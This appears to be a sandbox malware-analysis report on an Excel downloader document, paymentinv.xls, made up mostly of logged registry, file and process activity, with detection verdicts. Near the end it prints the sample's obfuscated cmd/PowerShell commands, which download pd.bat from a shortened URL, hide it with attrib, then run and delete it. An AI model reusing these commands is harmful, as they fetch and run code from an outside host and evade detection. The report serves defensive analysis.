Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read ConfigMask

File
00:05:765 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
miscellaneous

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read ConfigString

Registry
00:05:782 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d
Opened

Registry
00:05:782 Opened HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read EvalationData

File
00:05:796 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI
miscellaneous

Registry
00:05:860 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3e571dbb\41bddfc6
Opened

Registry
00:05:860 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation.resources_en-US_31bf3856ad364e35
Opened

Registry HKLM\System\CurrentControlSet\Control\Session Manager\Environment


00:05:890
Read PSMODULEPATH

Registry
00:05:890 HKCU\Environment
Opened

Registry HKCU\Environment
00:05:890
Read PSMODULEPATH

Registry
00:05:890 HKLM\System\CurrentControlSet\Control\Session Manager\Environment
Opened

00:05:907 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml

00:05:907 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0

Registry
00:05:907 HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Opened

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
00:05:907
Read path

00:05:907 Files Read C:\Users\Administrator\Documents

00:05:921 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
Files Read
00:05:938
Opened 8100000
00:05:968 Others Recorded system information

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml
Files Read
00:05:968
Opened 8100000

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
Files Read
00:06:296
Opened 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml
Files Read
00:06:329
Opened 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml
Files Read
00:06:343
Opened 8100000

00:06:360 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll

00:06:375 Files Read C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll

00:06:375 Files Read C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.dll

00:06:375 Files Read C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll

00:06:375 Files Read C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll

00:06:407 Files Read C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll

00:06:407 Files Read C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll

00:06:407 Files Read C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.dll

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
Files Read
00:06:438
Opened 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
Files Read
00:06:468
Opened 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml
Files Read
00:06:485
Opened 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
Files Read
00:06:843
Opened 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
Files Read
00:06:890
Opened 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml
Files Read
00:06:907
Opened 8100000

Registry
00:06:954 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Opened

Registry
00:06:968 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\a94d4ab\5a294d6
Opened

Registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
00:06:968
Read StackVersion

Registry
00:06:968 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management.resources_en-US_31bf3856ad364e35
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
Opened

00:07:000 Others Retrieved the user's logon name

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell
Opened

Registry HKCU\Control Panel\International


00:07:015
Read sYearMonth

Registry
00:07:015 HKCU\Control Panel\International
Opened

00:07:093 Files Read C:\

00:07:093 Files Read C:\Users\Administrator

File
00:07:093 Operations, Obtained information about the file system and volume associated with the root directory
miscellaneous

File
00:07:093 Operations, Obtained a bitmask representing the currently available disk drives
miscellaneous

File
00:07:093 Operations, Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive
miscellaneous

00:07:093 Files Read C:\.

Registry
00:07:157 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security.resources_en-US_31bf3856ad364e35
Opened

Registry
00:07:157 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\20fe3c1a\56aa3966
Opened

File
00:07:171 Operations, Obtained the current directory for the current process
miscellaneous

00:07:235 Files Read C:\Users\.


00:07:235 Files Read C:\Users\Administrator\Documents\.

00:07:235 Files Read C:\Users

00:07:235 Files Read C:\Users\Administrator\.

Registry
00:07:375 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
Opened

Registry
00:07:375 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:375
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:375
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:375
Read MVID

00:07:375 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72


Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read SIG

Registry
00:07:390 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualC__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:07:390
Read Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read NIDependencies

Registry
00:07:390 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read Status

File
00:07:407 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
miscellaneous

C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
Files Read
00:07:407
Opened Normal

00:07:546 Files Read C:\Users\Administrator\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

00:07:546 Files Read C:\Users\Administrator\Documents\WindowsPowerShell\profile.ps1

00:07:546 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1

00:07:546 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1

Registry
00:07:563 HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds
Opened

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds
00:07:579
Read PipelineMaxStackSizeMB

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read DisplayName

Registry
00:07:750 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
Read
ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read ConfigString

Registry
00:07:750 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
Opened
00:07:750 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read Status

Registry
00:07:750 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8
Opened

00:07:765 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config

C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config
Files Read
00:07:765
Opened 100000

File
00:07:765 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
miscellaneous

00:07:765 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\

00:07:765 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

00:07:782 Files Read pd.bat

C:\Users\Administrator\Documents\pd.bat
Files Write
00:07:782
Created 100000

Registry HKLM\Software\Microsoft\Windows NT\CurrentVersion


00:07:796
Read InstallationType

Registry
00:07:796 HKLM\Software\Microsoft\Windows NT\CurrentVersion
Opened

Socket
00:07:813 Initiated WS2_32 socket DLL
Activities

Socket
00:07:813 Closed the socket
Activities

Registry
00:07:829 HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
Opened

Registry
00:07:829 Opened HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance

00:07:829 Others Converted a string-format security descriptor into a valid, functional security descriptor

Signal
00:07:829 global\.net clr networking
Objects

Registry HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance


00:07:829
Read FileMappingSize

Registry HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance


00:07:829
Read First Counter

Registry HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance


00:07:829
Read IsMultiInstance

Registry HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance


00:07:829
Read Library

Registry HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance


00:07:829
Read CategoryOptions

Registry HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance


00:07:829
Read Counter Names

Registry
00:07:843 Retrieved a handle to the HKEY_CURRENT_USER key for the user the current thread is impersonating
Opened

Socket
00:07:843 Controlled the I/O mode of the newly created socket
Activities

Registry
00:07:860 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Opened

Registry
00:07:860 HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
Opened

Files
00:07:985 C:\Users\Administrator\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml
Deleted
00:08:015 Process {7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
Created

00:08:656 Files Read C:\ProgramData\Oracle\Java\javapath

File
00:08:671 Operations, Searched a directory for the name: C:\Windows\system32\attrib.ps1
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.WSH
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.ps1
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.psd1
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.psm1
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.WSF
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.VBS
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.VBE
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.MSC
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\Windows\system32\attrib.COM
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\Windows\system32\attrib.EXE
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JSE
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JS
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\Windows\system32\attrib.psm1
miscellaneous

00:08:671 Files Read C:\Windows\system32\attrib.exe

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.BAT
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.CMD
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.COM
miscellaneous

00:08:671 Files Read C:\Windows\system32

File
00:08:671 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.EXE
miscellaneous

File
00:08:671 Operations, Searched a directory for the name: C:\Windows\system32\attrib.psd1
miscellaneous

Process
00:08:687 "c:\windows\system32\attrib.exe" +s +h pd.bat
Created

00:08:718 Others Retrieved information about a locale specified by a identifier

Process
00:08:734 Ended itself and all of its threads
killed

Process
00:08:734 Operations, Enabled an application to supersede the top-level exception handler
miscellaneous

Files
00:08:765 C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2540.4059203
Deleted

Files
00:08:765 C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2540.4059203
Deleted

Process
00:08:765 Ended itself and all of its threads
killed

Files
00:08:765 C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2540.4059218
Deleted

Files
00:10:875 C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2548.4059203
Deleted

Files
00:10:875 C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2548.4059203
Deleted

Files
00:10:875 C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2548.4059203
Deleted

C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls, attribute: Normal


Files
00:13:062
Modified

C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Excel12.pip
Files Write
00:13:187
Created 8100000

Process
00:13:265 Ended itself and all of its threads
killed

Files
00:13:265 C:\Users\ADMINI~1\AppData\Local\Temp\55078.od
Deleted

Files
00:13:265 C:\Users\ADMINI~1\AppData\Local\Temp\CVRD726.tmp.cvr
Deleted

Process
00:13:281 Operations, Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses
miscellaneous

File
00:14:781 Operations, Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat
miscellaneous

Process
00:14:781 "c:\users\administrator\documents\pd.bat"
Created

00:14:781 Files Read C:\Users\Administrator\Documents\pd.bat

Process
00:14:796 "c:\users\admini~1\docume~1\pd.bat" "c:\users\administrator\documents\pd.bat"
Created

{6C467336-8281-4E60-8204-430CED96822D}
Process
00:14:875
Created

{E0629351-6F81-11D2-973F-00104B9B172F}
Process
00:14:890
Created

{8F170678-2A97-4D59-89A1-7A0A71C1B677}
Process
00:14:890
Created

{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}
Process
00:14:890
Created

{E97F7176-7C91-4648-A0CE-94F37BF016F8}
Process
00:14:906
Created

{25CD009F-FFBF-418A-8E11-7A877CAFCAF5}
Process
00:14:906
Created

{50EE5B75-5635-11D1-AC2A-D4EA0B000000}
Process
00:14:906
Created

{55C7A567-7B90-4885-9EDD-662D359ED389}
Process
00:14:906
Created

{6D49AC84-BEAD-11D1-A074-0080C740BFBD}
Process
00:14:906
Created

{7353C207-C0DA-45A1-93CC-47A853A736A1}
Process
00:14:906
Created
{F5078F32-C551-11D3-89B9-0000F81FE221}
Process
00:14:906
Created

{EFDB41B0-5538-42F1-995B-460DA31C0924}
Process
00:14:906
Created

{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
Process
00:14:921
Created

Registry HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
00:14:954
Read Default

Registry HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
00:14:954
Read Default

Registry
00:14:954 HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Opened

Registry
00:14:954 HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
Opened

Executed a shell command c:\users\administrator\documents\pd.bat


Process
00:14:954
Opened

Files
00:15:125 C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2804.4059203
Deleted

Files
00:15:125 Deleted C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2804.4059203

Files
00:15:125 C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2804.4059203
Deleted

Process
00:15:140 Operations, Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses
miscellaneous

Process
00:15:140 Ended itself and all of its threads
killed

File
00:19:687 Operations, Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat\*
miscellaneous

C:\Users\Administrator\Documents\pd.bat, attribute: Archive


Files
00:19:704
Modified

Files
00:19:704 C:\Users\Administrator\Documents\pd.bat
Deleted

Engine Analysis

Engine Threat Name Severity

GTI File Reputation TYPE_TROJAN ⬤ 5 - Very High

GTI URL Reputation

Gateway Anti-Malware W97M/Downloader.czq ⬤ 5 - Very High

Anti-Malware --- ⬤ Unverified

YARA

Custom Rules

Sandbox Malware.Dynamic ⬤ 5 - Very High

Final ⬤ 5 - Very High

Sample is malicious: final severity level 5

Embedded/Dropped content

MD5 Name Category

0DAC27616DC859C94A6CC2E7FBEFEC3D Excel12.pip * ---

D5801B4565D86068F3B2CC2EE906017F X43D78XIIKCRAJNR9GZN.temp * ---

* Attachments were extracted from the sample file and stored in the dropfiles.zip

Screenshots

Note: a pop-up window was detected during dynamic analysis so user interaction may be required in order to fully analyze this sample

Images: 2
f50e.jpg

fcfd.jpg

paymentinv.xls

Run-Time Dlls: 5
api-ms-win-appmodel-runtime-l1-1-0.dll

mso.dll

comctl32.dll

shlwapi.dll

version.dll

File Operations: 27

Files Created

File Name Access Mode File Attributes

C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Excel12.pip Write 8100000

Files Opened

File Name Access Mode File Attributes

C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE.config Read Normal

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v4.0.30319\clr.dll 20000 10000000

Files Deleted

C:\Users\ADMINI~1\AppData\Local\Temp\55078.od
C:\Users\ADMINI~1\AppData\Local\Temp\CVRD726.tmp.cvr
C:\Users\Administrator\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml

C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\254f614b-21fd-47d9-99c3-f23fd434845c.LNK

C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\dgwseciilw.LNK

Files Modified

Source File Destination File/Write Written

C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls, attribute: Normal

Files Read

C:\Windows\Microsoft.NET\Framework\

C:\Windows\Microsoft.NET\Framework\v2.0.50727

C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls

Other

Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive

Obtained a set of FAT file system attributes for a file or directory

Obtained the current directory for the current process

Obtained the path of the Windows system directory

Retrieved the full path for the module

Searched a directory for the name: C:\Program Files (x86)\Microsoft Office\Office12\xlstart\*.*

Searched a directory for the name: C:\Users\Administrator\AppData\Roaming\Microsoft\Excel\XLSTART\*.*

Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*

Searched a directory for the name: C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls

Registry Operations: 14

Registry Opened

HKCU\SOFTWARE\Microsoft\Office Test\Special\Perf

HKCU\Software\Microsoft\.NETFramework

HKCU\Software\Microsoft\Office\12.0\Excel

HKLM\SOFTWARE\Microsoft\Fusion

HKLM\Software\Microsoft\.NETFramework

HKLM\Software\Microsoft\.NETFramework\Policy\Upgrades

HKLM\Software\Microsoft\Windows\CurrentVersion

Registry Read

HKCU\Software\Microsoft\Office\12.0\Excel DisableThreadAffinity

HKLM\SOFTWARE\Microsoft\Fusion NoClientChecks

HKLM\Software\Microsoft\.NETFramework InstallRoot

HKLM\Software\Microsoft\.NETFramework OnlyUseLatestCLR

HKLM\Software\Microsoft\.NETFramework UseLegacyV2RuntimeActivationPolicyDefaultValue

HKLM\Software\Microsoft\Windows\CurrentVersion CommonFilesDir

Other

Enumerated the values for an open registry key

Process Operations: 26

Process Created

Process Name Module

cmd /c powershe^l^l -w 1 (new-ob`ject net.webclient).


system
('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')

system cmd /c powershe^l^l -w 1 start`-sle`ep 12; remove-item -path pd.bat -force

system cmd /c powershe^l^l -w 1 start`-sle`ep 1; attrib +s +h pd.bat

system cmd /c powershe^l^l -w 1 start`-sle`ep 3; move-item "pd.bat" -destination "$e`nv:t`emp"

system cmd /c powershe^l^l -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"

{0E5AAE11-A475-4C5B-AB00-
C66DE400274E}
{1F486A52-3CB1-48FD-8F50-
B8DC300D9F9D}

{7B8A2D94-0AC9-11D1-896C-
00C04FB6BFC4}

{88D969EC-8B8B-4C3D-859E-
AF6CD158BE0F}

{88D969EF-F192-11D4-A65F-
0040963251E5}

{C1EE01F2-B3B6-4A6A-9DDD-
E988C088EC82}

{DFFACDC5-679F-4156-8947-
C5C76BC0B67F}

{FA445657-9379-11D6-B41A-
00065B83EE53}

Process killed

Ended itself and all of its threads

Thread Created

2f70368f
